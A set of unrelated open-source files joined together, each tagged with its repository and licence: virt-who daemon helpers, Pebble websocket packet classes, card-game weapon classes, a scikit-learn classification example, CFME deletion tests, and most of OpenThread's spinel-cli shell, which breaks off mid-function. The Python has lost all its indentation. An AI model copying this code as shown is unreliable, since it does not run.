for fd in reversed(range(maxfd)):
if fd not in exclude:
close_file_descriptor_if_open(fd)
def redirect_stream(system_stream, target_stream):
""" Redirect a system stream to a specified file.
`system_stream` is a standard system stream such as
``sys.stdout``. `target_stream` is an open file object that
should replace the corresponding system stream object.
If `target_stream` is ``None``, defaults to opening the
operating system's null device and using its file descriptor.
"""
if target_stream is None:
target_fd = os.open(os.devnull, os.O_RDWR)
else:
target_fd = target_stream.fileno()
os.dup2(target_fd, system_stream.fileno())
def make_default_signal_map():
""" Make the default signal map for this system.
The signals available differ by system. The map will not
contain any signals not defined on the running system.
"""
name_map = {
'SIGTSTP': None,
'SIGTTIN': None,
'SIGTTOU': None,
'SIGTERM': 'terminate',
}
signal_map = dict(
(getattr(signal, name), target)
for (name, target) in name_map.items()
if hasattr(signal, name))
return signal_map
def set_signal_handlers(signal_handler_map):
""" Set the signal handlers as specified.
The `signal_handler_map` argument is a map from signal number
to signal handler. See the `signal` module for details.
"""
for (signal_number, handler) in signal_handler_map.items():
signal.signal(signal_number, handler)
def register_atexit_function(func):
""" Register a function for processing at program exit.
The function `func` is registered for a call with no arguments
at program exit.
"""
atexit.register(func)
|
candlepin/virt-who
|
virtwho/daemon/daemon.py
|
Python
|
gpl-2.0
| 25,080
|
from __future__ import absolute_import
__author__ = 'katharine'
from six import iteritems
from enum import IntEnum
from libpebble2.protocol.base import PebblePacket
from libpebble2.protocol.base.types import *
class WebSocketRelayFromWatch(PebblePacket):
payload = BinaryArray()
class WebSocketRelayToWatch(PebblePacket):
payload = BinaryArray()
class WebSocketPhoneAppLog(PebblePacket):
payload = FixedString()
class WebSocketPhoneServerLog(PebblePacket):
payload = BinaryArray()
class WebSocketInstallBundle(PebblePacket):
pbw = BinaryArray()
class WebSocketInstallStatus(PebblePacket):
class StatusCode(IntEnum):
Success = 0x00
Failed = 0x01
status = Uint8()
class WebSocketPhoneInfoRequest(PebblePacket):
version = Uint8(default=0x00)
class WebSocketInstallPhoneInfoResponse(PebblePacket):
payload = BinaryArray()
class WebSocketConnectionStatusUpdate(PebblePacket):
class StatusCode(IntEnum):
Connected = 0xff
Disconnected = 0x00
status = Uint8()
class WebSocketProxyConnectionStatusUpdate(PebblePacket):
class StatusCode(IntEnum):
Connected = 0xff
Disconnected = 0x00
status = Uint8()
class WebSocketProxyAuthenticationRequest(PebblePacket):
token = PascalString()
class WebSocketProxyAuthenticationResponse(PebblePacket):
class StatusCode(IntEnum):
Success = 0x00
Failed = 0x01
status = Uint8()
class AppConfigSetup(PebblePacket):
pass
class AppConfigResponse(PebblePacket):
length = Uint32()
data = FixedString(length=length)
class AppConfigCancelled(PebblePacket):
pass
class AppConfigURL(PebblePacket):
length = Uint32()
data = FixedString(length=length)
class WebSocketPhonesimAppConfig(PebblePacket):
command = Uint8()
config = Union(command, {
0x01: AppConfigSetup,
0x02: AppConfigResponse,
0x03: AppConfigCancelled,
})
class WebSocketPhonesimConfigResponse(PebblePacket):
command = Uint8()
config = Union(command, {
0x01: AppConfigURL
})
class WebSocketRelayQemu(PebblePacket):
protocol = Uint8()
data = BinaryArray()
class InsertPin(PebblePacket):
json = FixedString()
class DeletePin(PebblePacket):
uuid = FixedString(36)
class WebSocketTimelinePin(PebblePacket):
command = Uint8()
data = Union(command, {
0x01: InsertPin,
0x02: DeletePin
})
class WebSocketTimelineResponse(PebblePacket):
class Status(IntEnum):
Succeeded = 0x00
Failed = 0x01
status = Uint8(enum=Status)
to_watch = {
0x01: WebSocketRelayToWatch,
0x04: WebSocketInstallBundle,
0x06: WebSocketPhoneInfoRequest,
0x09: WebSocketProxyAuthenticationRequest,
0x0a: WebSocketPhonesimAppConfig,
0x0b: WebSocketRelayQemu,
0x0c: WebSocketTimelinePin
}
from_watch = {
0x00: WebSocketRelayFromWatch,
0x01: WebSocketRelayToWatch,
0x02: WebSocketPhoneAppLog,
0x03: WebSocketPhoneServerLog,
0x05: WebSocketInstallStatus,
0x06: WebSocketPhoneInfoRequest,
0x07: WebSocketConnectionStatusUpdate,
0x08: WebSocketProxyConnectionStatusUpdate,
0x09: WebSocketProxyAuthenticationResponse,
0x0a: WebSocketPhonesimConfigResponse,
0x0c: WebSocketTimelineResponse,
}
endpoints = {v: k for k, v in iteritems(to_watch)}
endpoints.update({v: k for k, v in iteritems(from_watch)})
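# Small lookup example (added for illustration): the `endpoints` mapping built
# above lets callers go from a packet class back to its websocket opcode, e.g.
#
#   assert endpoints[WebSocketRelayToWatch] == 0x01
#   assert endpoints[WebSocketPhoneAppLog] == 0x02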
|
susundberg/pebble-linux-remote
|
host_python/libpebble2/communication/transports/websocket/protocol.py
|
Python
|
gpl-2.0
| 3,434
|
from SDWLE.cards.base import WeaponCard
from SDWLE.game_objects import Weapon
from SDWLE.tags.action import Damage
from SDWLE.tags.base import Battlecry, Buff
from SDWLE.tags.condition import GreaterThan, IsType
from SDWLE.tags.selector import CharacterSelector, UserPicker, Count, MinionSelector
from SDWLE.tags.status import ChangeAttack
from SDWLE.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
class WickedKnife(WeaponCard):
def __init__(self):
super().__init__("Wicked Knife", 1, CHARACTER_CLASS.ROGUE, CARD_RARITY.FREE, False)
def create_weapon(self, player):
return Weapon(1, 2)
class AssassinsBlade(WeaponCard):
def __init__(self):
super().__init__("Assassin's Blade", 5, CHARACTER_CLASS.ROGUE, CARD_RARITY.COMMON)
def create_weapon(self, player):
return Weapon(3, 4)
class PerditionsBlade(WeaponCard):
def __init__(self):
super().__init__("Perdition's Blade", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.RARE,
battlecry=Battlecry(Damage(1), CharacterSelector(None, picker=UserPicker())),
combo=Battlecry(Damage(2), CharacterSelector(None, picker=UserPicker())))
def create_weapon(self, player):
return Weapon(2, 2)
class CogmastersWrench(WeaponCard):
def __init__(self):
super().__init__("Cogmaster's Wrench", 3, CHARACTER_CLASS.ROGUE, CARD_RARITY.EPIC)
def create_weapon(self, player):
return Weapon(1, 3, buffs=[Buff(ChangeAttack(2), GreaterThan(Count(MinionSelector(IsType(MINION_TYPE.MECH))),
value=0))])
|
jomyhuang/sdwle
|
SDWLE/cards_copy/weapons/rogue.py
|
Python
|
mit
| 1,651
|
"""Classification example using sci-kit learn k-nearest
"""
import pandas as pd
import numpy as np
from sklearn import cross_validation, neighbors
# read data, replace missing values, drop useless id column
df = pd.read_csv('breast-cancer-wisconsin.data')
df.replace('?', -99999, inplace=True)
df.drop(['id'], 1, inplace=True)
# x = columns excluding class/features; y = class/label
x = np.array(df.drop(['class'], 1))
y = np.array(df['class'])
# split data
x_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.2)
# train and fit classifier using sci-kit k-neighbors
clf = neighbors.KNeighborsClassifier()
clf.fit(x_train, y_train)
# test accuracy
accuracy = clf.score(x_test, y_test)
print(accuracy)
# made up point to test the classifier
example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1], [4, 2, 1, 2, 2, 2, 3, 2, 1]])
example_measures = example_measures.reshape(len(example_measures), -1)
prediction = clf.predict(example_measures)
print(prediction)
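# Note added for context: the sklearn.cross_validation module used above was
# removed in later scikit-learn releases. Assuming scikit-learn >= 0.18, the
# equivalent split is:
#
#   from sklearn.model_selection import train_test_split
#   x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)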
|
FelixPM/Learning-Machine-Learning
|
sentdex/classification.py
|
Python
|
mit
| 1,002
|
# -*- coding: utf-8 -*-
import pytest
from cfme import test_requirements
from cfme.cloud.stack import Stack
from cfme.common.vm import VM
from cfme.fixtures import pytest_selenium as sel
from cfme.web_ui import toolbar, Quadicon
from utils import testgen
from utils.appliance.implementations.ui import navigate_to
from utils.version import current_version
def pytest_generate_tests(metafunc):
# Filter out providers without templates defined
argnames, argvalues, idlist = testgen.cloud_providers(metafunc, required_fields=['remove_test'])
testgen.parametrize(metafunc, argnames, argvalues, ids=idlist, scope="module")
pytestmark = [pytest.mark.tier(2),
test_requirements.general_ui]
@pytest.fixture(scope="module")
def set_grid():
sel.force_navigate("clouds_images")
toolbar.select('Grid View')
def reset():
# TODO replace this navigation with navmazing when cloud images supports it
sel.force_navigate("clouds_images")
toolbar.select('List View')
# TODO take generic object instead of stack when instance and image support navmazing destinations
def refresh_and_wait(provider, stack):
provider.refresh_provider_relationships()
navigate_to(stack, 'All')
if not sel.is_displayed(Quadicon(stack.name, stack.quad_name)):
stack.wait_for_appear()
def test_delete_instance(setup_provider, provider):
""" Tests delete instance
Metadata:
test_flag: delete_object
"""
instance_name = provider.data['remove_test']['instance']
test_instance = VM.factory(instance_name, provider)
test_instance.delete(from_details=False)
test_instance.wait_for_delete()
provider.refresh_provider_relationships()
test_instance.wait_to_appear()
def test_delete_image(setup_provider, provider, set_grid, request):
""" Tests delete image
Metadata:
test_flag: delete_object
"""
# TODO as of 5.6+ clouds_images is no longer in the menu tree
# Refactor to navigate via clouds instances accordion
image_name = provider.data['remove_test']['image']
test_image = VM.factory(image_name, provider, template=True)
test_image.delete(from_details=False)
test_image.wait_for_delete()
provider.refresh_provider_relationships()
test_image.wait_to_appear()
request.addfinalizer(reset)
@pytest.mark.uncollectif(lambda: current_version() < "5.4")
def test_delete_stack(setup_provider, provider, provisioning, request):
""" Tests delete stack
Metadata:
test_flag: delete_object
"""
stack = Stack(provisioning['stack'])
refresh_and_wait(provider, stack)
stack.delete()
navigate_to(stack, 'All')
    assert not sel.is_displayed(Quadicon(stack.name, stack.quad_name))
|
kzvyahin/cfme_tests
|
cfme/tests/cloud/test_delete_cloud_object.py
|
Python
|
gpl-2.0
| 2,744
|
#!/usr/bin/env python3
#
# Copyright (c) 2016-2019, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Shell tool for controlling OpenThread NCP instances.
"""
import os
import sys
import time
import traceback
import random
import importlib
import optparse
import binascii
import socket
import struct
import string
import textwrap
import logging
import logging.config
import logging.handlers
from cmd import Cmd
from spinel.const import SPINEL
from spinel.const import kThread
from spinel.codec import WpanApi
from spinel.codec import SpinelCodec
from spinel.stream import StreamOpen
from spinel.tun import TunInterface
import spinel.config as CONFIG
import spinel.util as util
import ipaddress
__copyright__ = "Copyright (c) 2016 The OpenThread Authors."
__version__ = "0.1.0"
NETWORK_PROMPT = "spinel-cli"
import io
import spinel.ipv6 as ipv6
import spinel.common as common
DEFAULT_BAUDRATE = 115200
class IcmpV6Factory(object):
ipv6_factory = ipv6.IPv6PacketFactory(
ehf={
0:
ipv6.HopByHopFactory(
hop_by_hop_options_factory=ipv6.HopByHopOptionsFactory(
options_factories={109: ipv6.MPLOptionFactory()}))
},
ulpf={
58:
ipv6.ICMPv6Factory(
body_factories={129: ipv6.ICMPv6EchoBodyFactory()})
})
def _any_identifier(self):
return random.getrandbits(16)
def _seq_number(self):
seq_number = 0
while True:
yield seq_number
seq_number += 1
            # wrap the 16-bit sequence number back to zero on overflow
            seq_number = seq_number if seq_number < (1 << 16) else 0
def build_icmp_echo_request(self,
src,
dst,
data,
hop_limit=64,
identifier=None,
sequence_number=None):
identifier = self._any_identifier(
) if identifier is None else identifier
sequence_number = next(
self._seq_number()) if sequence_number is None else sequence_number
ping_req = ipv6.IPv6Packet(
ipv6_header=ipv6.IPv6Header(source_address=src,
destination_address=dst,
hop_limit=hop_limit),
upper_layer_protocol=ipv6.ICMPv6(
header=ipv6.ICMPv6Header(_type=ipv6.ICMP_ECHO_REQUEST, code=0),
body=ipv6.ICMPv6EchoBody(identifier=identifier,
sequence_number=sequence_number,
data=data)))
return ping_req.to_bytes()
def from_bytes(self, data):
return self.ipv6_factory.parse(io.BytesIO(data), common.MessageInfo())
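# Illustrative sketch (never called by the CLI): building a raw ICMPv6 Echo
# Request with IcmpV6Factory, the same way do_ping() does further below.
# Both addresses are hypothetical examples, not values used elsewhere here.
def _icmp_factory_example():
    factory = IcmpV6Factory()
    # identifier/sequence_number default to a random id and 0 when omitted
    return factory.build_icmp_echo_request(
        'fdde:ad00:beef:0:558:f56b:d688:799',  # assumed source address
        'fdde:ad00:beef:0:0:ff:fe00:c00',      # assumed destination address
        bytearray(8))                          # 8-byte zero payload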
class SpinelCliCmd(Cmd, SpinelCodec):
"""
A command line shell for controlling OpenThread NCP nodes
via the Spinel protocol.
"""
VIRTUAL_TIME = os.getenv('VIRTUAL_TIME') == '1'
icmp_factory = IcmpV6Factory()
def _init_virtual_time(self):
"""
compute addresses used for virtual time.
"""
BASE_PORT = 9000
MAX_NODES = 34
PORT_OFFSET = int(os.getenv("PORT_OFFSET", "0"))
self._addr = ('127.0.0.1', BASE_PORT * 2 + MAX_NODES * PORT_OFFSET)
self._simulator_addr = ('127.0.0.1',
BASE_PORT + MAX_NODES * PORT_OFFSET)
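        # e.g. with PORT_OFFSET=0 this node binds 127.0.0.1:18000 and sends
        # simulator events to 127.0.0.1:9000 (see _notify_simulator below)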
def __init__(self, stream, nodeid, vendor_module, *_a, **kw):
if self.VIRTUAL_TIME:
self._init_virtual_time()
self.nodeid = nodeid
self.tun_if = None
self.wpan_api = WpanApi(stream, nodeid, vendor_module=vendor_module)
self.wpan_api.queue_register(SPINEL.HEADER_DEFAULT)
self.wpan_api.callback_register(SPINEL.PROP_STREAM_NET,
self.wpan_callback)
Cmd.__init__(self)
Cmd.identchars = string.ascii_letters + string.digits + '-'
if sys.stdin.isatty():
self.prompt = NETWORK_PROMPT + " > "
else:
self.use_rawinput = 0
self.prompt = ""
SpinelCliCmd.command_names.sort()
self.history_filename = os.path.expanduser("~/.spinel-cli-history")
try:
import readline
try:
readline.read_history_file(self.history_filename)
except IOError:
pass
except ImportError:
print("Module readline unavailable")
else:
import rlcompleter
if readline.__doc__ and 'libedit' in readline.__doc__:
readline.parse_and_bind('bind ^I rl_complete')
else:
readline.parse_and_bind('tab: complete')
if hasattr(stream, 'pipe'):
self.wpan_api.queue_wait_for_prop(SPINEL.PROP_LAST_STATUS,
SPINEL.HEADER_ASYNC)
self.prop_set_value(SPINEL.PROP_IPv6_ICMP_PING_OFFLOAD, 1)
self.prop_set_value(SPINEL.PROP_THREAD_RLOC16_DEBUG_PASSTHRU, 1)
command_names = [
# Shell commands
'exit',
'quit',
'clear',
'history',
'debug',
'debug-mem',
'v',
'h',
'q',
# OpenThread CLI commands
'help',
'bufferinfo',
'channel',
'child',
'childmax',
'childtimeout',
'commissioner',
'contextreusedelay',
'counters',
'diag',
'discover',
'eidcache',
'extaddr',
'extpanid',
'ifconfig',
'ipaddr',
'joiner',
'keysequence',
'leaderdata',
'leaderweight',
'mac',
'macfilter',
'mfg',
'mode',
'netdata',
'networkidtimeout',
'networkkey',
'networkname',
'panid',
'parent',
'ping',
'prefix',
'releaserouterid',
'reset',
'rloc16',
'route',
'router',
'routerselectionjitter',
'routerupgradethreshold',
'routerdowngradethreshold',
'scan',
'state',
'thread',
'txpower',
'version',
'vendor',
# OpenThread Spinel-specific commands
'ncp-ml64',
'ncp-ll64',
'ncp-tun',
'ncp-raw',
'ncp-filter',
]
@classmethod
def wpan_callback(cls, prop, value, tid):
consumed = False
if prop == SPINEL.PROP_STREAM_NET:
consumed = True
try:
pkt = cls.icmp_factory.from_bytes(value)
if CONFIG.DEBUG_LOG_PKT:
CONFIG.LOGGER.debug(pkt)
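                # do_ping() packs the transmit time (ms, 32-bit) into the echo
                # identifier (high 16 bits) and sequence number (low 16 bits),
                # so the round-trip time can be recovered from the reply alone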
timenow = int(round(time.time() * 1000)) & 0xFFFFFFFF
timestamp = (pkt.upper_layer_protocol.body.identifier << 16 |
pkt.upper_layer_protocol.body.sequence_number)
timedelta = (timenow - timestamp)
print("\n%d bytes from %s: icmp_seq=%d hlim=%d time=%dms" %
(len(pkt.upper_layer_protocol.body.data),
pkt.ipv6_header.source_address,
pkt.upper_layer_protocol.body.sequence_number,
pkt.ipv6_header.hop_limit, timedelta))
except RuntimeError:
pass
return consumed
@classmethod
def log(cls, text):
""" Common log handler. """
CONFIG.LOGGER.info(text)
def parseline(self, line):
cmd, arg, line = Cmd.parseline(self, line)
if cmd:
cmd = self.short_command_name(cmd)
line = cmd + ' ' + arg
return cmd, arg, line
def completenames(self, text, *ignored):
return [
name + ' '
for name in SpinelCliCmd.command_names
if name.startswith(text) or
self.short_command_name(name).startswith(text)
]
@classmethod
def short_command_name(cls, cmd):
return cmd.replace('-', '')
def postloop(self):
try:
import readline
try:
readline.write_history_file(self.history_filename)
except IOError:
pass
except ImportError:
pass
def prop_get_value(self, prop_id):
""" Blocking helper to return value for given propery identifier. """
return self.wpan_api.prop_get_value(prop_id)
def prop_set_value(self, prop_id, value, py_format='B'):
""" Blocking helper to set value for given propery identifier. """
return self.wpan_api.prop_set_value(prop_id, value, py_format)
def prop_insert_value(self, prop_id, value, py_format='B'):
""" Blocking helper to insert entry for given list property. """
return self.wpan_api.prop_insert_value(prop_id, value, py_format)
def prop_remove_value(self, prop_id, value, py_format='B'):
""" Blocking helper to remove entry for given list property. """
return self.wpan_api.prop_remove_value(prop_id, value, py_format)
def prop_get_or_set_value(self, prop_id, line, mixed_format='B'):
""" Helper to get or set a property value based on line arguments. """
if line:
value = self.prep_line(line, mixed_format)
py_format = self.prep_format(value, mixed_format)
value = self.prop_set_value(prop_id, value, py_format)
else:
value = self.prop_get_value(prop_id)
return value
@classmethod
def prep_line(cls, line, mixed_format='B'):
""" Convert a command line argument to proper binary encoding (pre-pack). """
value = line
if line != None:
            if mixed_format == 'U':  # For UTF8, NUL-terminate and encode the line
line += '\0'
value = line.encode('utf-8')
elif mixed_format in (
'D',
                    'E'):  # Expect raw data to be a hex string w/o delimiters
value = util.hex_to_bytes(line)
elif isinstance(line, str):
# Most everything else is some type of integer
value = int(line, 0)
return value
@classmethod
def prep_format(cls, value, mixed_format='B'):
""" Convert a spinel format to a python pack format. """
py_format = mixed_format
if value == "":
py_format = '0s'
elif mixed_format in ('D', 'U', 'E'):
py_format = str(len(value)) + 's'
return py_format
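    # Illustrative example: prep_line('dead00beef00cafe', 'E') returns the 8 raw
    # bytes of the extended address, and prep_format() on those bytes yields '8s'
    # so they are packed as an 8-byte string.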
def prop_get(self, prop_id, mixed_format='B'):
""" Helper to get a propery and output the value with Done or Error. """
value = self.prop_get_value(prop_id)
if value is None:
print("Error")
return None
if (mixed_format == 'D') or (mixed_format == 'E'):
print(util.hexify_str(value, ''))
else:
print(str(value))
print("Done")
return value
def prop_set(self, prop_id, line, mixed_format='B', output=True):
""" Helper to set a propery and output Done or Error. """
value = self.prep_line(line, mixed_format)
py_format = self.prep_format(value, mixed_format)
result = self.prop_set_value(prop_id, value, py_format)
if not output:
return result
if result is None:
print("Error")
else:
print("Done")
return result
def handle_property(self, line, prop_id, mixed_format='B', output=True):
""" Helper to set property when line argument passed, get otherwise. """
value = self.prop_get_or_set_value(prop_id, line, mixed_format)
if not output:
return value
if value is None or value == "":
print("Error")
return None
if line is None or line == "":
# Only print value on PROP_VALUE_GET
if mixed_format == '6':
print(str(ipaddress.IPv6Address(value)))
elif (mixed_format == 'D') or (mixed_format == 'E'):
print(binascii.hexlify(value).decode('utf8'))
elif mixed_format == 'H':
if prop_id == SPINEL.PROP_MAC_15_4_PANID:
print("0x%04x" % value)
else:
print("%04x" % value)
else:
print(str(value))
print("Done")
return value
def do_help(self, line):
if line:
cmd, _arg, _unused = self.parseline(line)
try:
doc = getattr(self, 'do_' + cmd).__doc__
except AttributeError:
doc = None
if doc:
self.log("%s\n" % textwrap.dedent(doc))
else:
self.log("No help on %s\n" % (line))
else:
self.print_topics(
"\nAvailable commands (type help <name> for more information):",
SpinelCliCmd.command_names, 15, 80)
def do_v(self, _line):
"""
version
            Show detailed version information for the spinel-cli tool.
"""
self.log(NETWORK_PROMPT + " ver. " + __version__)
self.log(__copyright__)
@classmethod
def do_clear(cls, _line):
""" Clean up the display. """
os.system('reset')
def do_history(self, _line):
"""
history
Show previously executed commands.
"""
try:
import readline
hist = readline.get_current_history_length()
for idx in range(1, hist + 1):
self.log(readline.get_history_item(idx))
except ImportError:
pass
def do_h(self, line):
""" Shortcut for history. """
self.do_history(line)
def do_exit(self, _line):
""" Exit the shell. """
self.log("exit")
return True
def do_quit(self, line):
""" Exit the shell. """
return self.do_exit(line)
def do_q(self, line):
""" Exit the shell. """
return self.do_exit(line)
def do_EOF(self, _line):
""" End of file handler for when commands are piped into shell. """
self.log("\n")
return True
def emptyline(self):
pass
def default(self, line):
if line[0] == "#":
CONFIG.LOGGER.debug(line)
else:
CONFIG.LOGGER.info(line + ": command not found")
# exec(line)
def do_debug(self, line):
"""
Enables detail logging of bytes over the wire to the radio modem.
Usage: debug <1=enable | 0=disable>
"""
if line != None and line != "":
level = int(line)
else:
level = 0
CONFIG.debug_set_level(level)
def do_debugmem(self, _line):
""" Profile python memory usage. """
from guppy import hpy
heap_stats = hpy()
print(heap_stats.heap())
print()
print(heap_stats.heap().byrcs)
def do_bufferinfo(self, line):
"""
\033[1mbufferinfo\033[0m
Get the mesh forwarder buffer info.
\033[2m
> bufferinfo
total: 128
free: 128
6lo send: 0 0
6lo reas: 0 0
ip6: 0 0
mpl: 0 0
mle: 0 0
arp: 0 0
coap: 0 0
Done
\033[0m
"""
result = self.prop_get_value(SPINEL.PROP_MSG_BUFFER_COUNTERS)
if result != None:
print("total: %d" % result[0])
print("free: %d" % result[1])
print("6lo send: %d %d" % result[2:4])
print("6lo reas: %d %d" % result[4:6])
print("ip6: %d %d" % result[6:8])
print("mpl: %d %d" % result[8:10])
print("mle: %d %d" % result[10:12])
print("arp: %d %d" % result[12:14])
print("coap: %d %d" % result[14:16])
print("Done")
else:
print("Error")
def do_channel(self, line):
"""
\033[1mchannel\033[0m
Get the IEEE 802.15.4 Channel value.
\033[2m
> channel
11
Done
\033[0m
\033[1mchannel <channel>\033[0m
Set the IEEE 802.15.4 Channel value.
\033[2m
> channel 11
Done
\033[0m
"""
self.handle_property(line, SPINEL.PROP_PHY_CHAN)
def do_child(self, line):
"""\033[1m
child list
\033[0m
List attached Child IDs
\033[2m
> child list
1 2 3 6 7 8
Done
\033[0m\033[1m
child <id>
\033[0m
Print diagnostic information for an attached Thread Child.
The id may be a Child ID or an RLOC16.
\033[2m
> child 1
Child ID: 1
Rloc: 9c01
Ext Addr: e2b3540590b0fd87
Mode: rsn
Net Data: 184
Timeout: 100
Age: 0
LQI: 3
RSSI: -20
Done
\033[0m
"""
child_table = self.prop_get_value(SPINEL.PROP_THREAD_CHILD_TABLE)[0]
if line == 'list':
result = ''
for child_data in child_table:
child_data = child_data[0]
child_id = child_data[1] & 0x1FF
result += '{} '.format(child_id)
print(result)
print("Done")
else:
try:
child_id = int(line)
printed = False
for child_data in child_table:
child_data = child_data[0]
id = child_data[1] & 0x1FF
if id == child_id:
mode = ''
if child_data[7] & 0x08:
mode += 'r'
if child_data[7] & 0x04:
mode += 's'
if child_data[7] & 0x02:
mode += 'd'
if child_data[7] & 0x01:
mode += 'n'
print("Child ID: {}".format(id))
print("Rloc: {:04x}".format(child_data[1]))
print("Ext Addr: {}".format(
binascii.hexlify(child_data[0])))
print("Mode: {}".format(mode))
print("Net Data: {}".format(child_data[4]))
print("Timeout: {}".format(child_data[2]))
print("Age: {}".format(child_data[3]))
print("LQI: {}".format(child_data[5]))
print("RSSI: {}".format(child_data[6]))
print("Done")
printed = True
if not printed:
print("Error")
except ValueError:
print("Error")
def do_childmax(self, line):
"""\033[1m
childmax
\033[0m
Get the Thread Child Count Max value.
\033[2m
> childmax
10
Done
\033[0m\033[1m
childmax <timeout>
\033[0m
Set the Thread Child Count Max value.
\033[2m
> childmax 5
Done
\033[0m
"""
self.handle_property(line, SPINEL.PROP_THREAD_CHILD_COUNT_MAX)
def do_childtimeout(self, line):
"""\033[1m
childtimeout
\033[0m
Get the Thread Child Timeout value.
\033[2m
> childtimeout
300
Done
\033[0m\033[1m
childtimeout <timeout>
\033[0m
Set the Thread Child Timeout value.
\033[2m
> childtimeout 300
Done
\033[0m
"""
self.handle_property(line, SPINEL.PROP_THREAD_CHILD_TIMEOUT, 'L')
def do_commissioner(self, line):
"""
These commands are enabled when configuring with --enable-commissioner.
\033[1m
commissioner start
\033[0m
Start the Commissioner role on this node.
\033[2m
> commissioner start
Done
\033[0m\033[1m
commissioner stop
\033[0m
Stop the Commissioner role on this node.
\033[2m
> commissioner stop
Done
\033[0m\033[1m
commissioner panid <panid> <mask> <destination>
\033[0m
Perform panid query.
\033[2m
> commissioner panid 57005 4294967295 ff33:0040:fdde:ad00:beef:0:0:1
Conflict: dead, 00000800
Done
\033[0m\033[1m
commissioner energy <mask> <count> <period> <scanDuration>
\033[0m
Perform energy scan.
\033[2m
> commissioner energy 327680 2 32 1000 fdde:ad00:beef:0:0:ff:fe00:c00
Energy: 00050000 0 0 0 0
Done
\033[0m
"""
pass
def do_contextreusedelay(self, line):
"""
contextreusedelay
Get the CONTEXT_ID_REUSE_DELAY value.
> contextreusedelay
11
Done
contextreusedelay <delay>
Set the CONTEXT_ID_REUSE_DELAY value.
> contextreusedelay 11
Done
"""
self.handle_property(line, SPINEL.PROP_THREAD_CONTEXT_REUSE_DELAY, 'L')
def do_counters(self, line):
"""
counters
Get the supported counter names.
> counters
mac
mle
Done
counters <countername>
Get the counter value.
> counters mac
TxTotal: 10
TxUnicast: 3
TxBroadcast: 7
TxAckRequested: 3
TxAcked: 3
TxNoAckRequested: 7
TxData: 10
TxDataPoll: 0
TxBeacon: 0
TxBeaconRequest: 0
TxOther: 0
TxRetry: 0
TxDirectRetrySuccess: [ 0:2, 1:2, 2:1 ]
TxDirectMaxRetryExpiry: 1
TxIndirectRetrySuccess: [ 0:0 ]
TxIndirectMaxRetryExpiry: 1
TxErrCca: 0
TxAbort: 0
TxErrBusyChannel: 0
RxTotal: 2
RxUnicast: 1
RxBroadcast: 1
RxData: 2
RxDataPoll: 0
RxBeacon: 0
RxBeaconRequest: 0
RxOther: 0
RxAddressFiltered: 0
RxDestAddrFiltered: 0
RxDuplicated: 0
RxErrNoFrame: 0
RxErrNoUnknownNeighbor: 0
RxErrInvalidSrcAddr: 0
RxErrSec: 0
RxErrFcs: 0
RxErrOther: 0
Done
> counters mle
Role Disabled: 0
Role Detached: 1
Role Child: 0
Role Router: 0
Role Leader: 1
Attach Attempts: 1
Partition Id Changes: 1
Better Partition Attach Attempts: 0
Parent Changes: 0
Done
counters <countername> reset
Reset the counter value.
> counters mac reset
Done
> counters mle reset
Done
"""
params = line.split(" ")
if params[0] == "mac":
if len(params) == 1:
histogram = None
result = self.prop_get_value(SPINEL.PROP_CNTR_ALL_MAC_COUNTERS)
caps_list = self.prop_get_value(SPINEL.PROP_CAPS)
for caps in caps_list[0]:
if SPINEL.CAP_MAC_RETRY_HISTOGRAM == caps[0][0]:
histogram = self.prop_get_value(
SPINEL.PROP_CNTR_MAC_RETRY_HISTOGRAM)
if result != None:
counters_tx = result[0][0]
counters_rx = result[1][0]
print("TxTotal: %d" % counters_tx[0])
print(" TxUnicast: %d" % counters_tx[1])
print(" TxBroadcast: %d" % counters_tx[2])
print(" TxAckRequested: %d" % counters_tx[3])
print(" TxAcked: %d" % counters_tx[4])
print(" TxNoAckRequested: %d" % counters_tx[5])
print(" TxData: %d" % counters_tx[6])
print(" TxDataPoll: %d" % counters_tx[7])
print(" TxBeacon: %d" % counters_tx[8])
print(" TxBeaconRequest: %d" % counters_tx[9])
print(" TxOther: %d" % counters_tx[10])
print(" TxRetry: %d" % counters_tx[11])
if histogram != None:
histogram_direct = histogram[0][0]
if len(histogram_direct) != 0:
print(" TxDirectRetrySuccess: [", end='')
for retry in range(len(histogram_direct)):
print(" %d:%s" %
(retry, histogram_direct[retry][0]),
end=',' if retry !=
(len(histogram_direct) - 1) else " ]\n")
print(" TxDirectMaxRetryExpiry: %s" %
(counters_tx[15][0]))
if histogram != None:
histogram_indirect = histogram[1][0]
if len(histogram_indirect) != 0:
print(" TxIndirectRetrySuccess: [", end='')
for retry in range(len(histogram_indirect)):
print(" %d:%s" %
(retry, histogram_indirect[retry][0]),
end=',' if retry !=
(len(histogram_indirect) - 1) else " ]\n")
print(" TxIndirectMaxRetryExpiry: %s" %
(counters_tx[16][0]))
print(" TxErrCca: %d" % counters_tx[12])
print(" TxAbort: %d" % counters_tx[13])
print(" TxErrBusyChannel: %d" % counters_tx[14])
print("RxTotal: %d" % counters_rx[0])
print(" RxUnicast: %d" % counters_rx[1])
print(" RxBroadcast: %d" % counters_rx[2])
print(" RxData: %d" % counters_rx[3])
print(" RxDataPoll: %d" % counters_rx[4])
print(" RxBeacon: %d" % counters_rx[5])
print(" RxBeaconRequest: %d" % counters_rx[6])
print(" RxOther: %d" % counters_rx[7])
print(" RxAddressFiltered: %d" % counters_rx[8])
print(" RxDestAddrFiltered: %d" % counters_rx[9])
print(" RxDuplicated: %d" % counters_rx[10])
print(" RxErrNoFrame: %d" % counters_rx[11])
print(" RxErrNoUnknownNeighbor: %d" % counters_rx[12])
print(" RxErrInvalidSrcAddr: %d" % counters_rx[13])
print(" RxErrSec: %d" % counters_rx[14])
print(" RxErrFcs: %d" % counters_rx[15])
print(" RxErrOther: %d" % counters_rx[16])
print("Done")
else:
print("Error")
elif len(params) == 2:
if params[1] == "reset":
self.prop_set_value(SPINEL.PROP_CNTR_ALL_MAC_COUNTERS, 1)
self.prop_set_value(SPINEL.PROP_CNTR_MAC_RETRY_HISTOGRAM, 1)
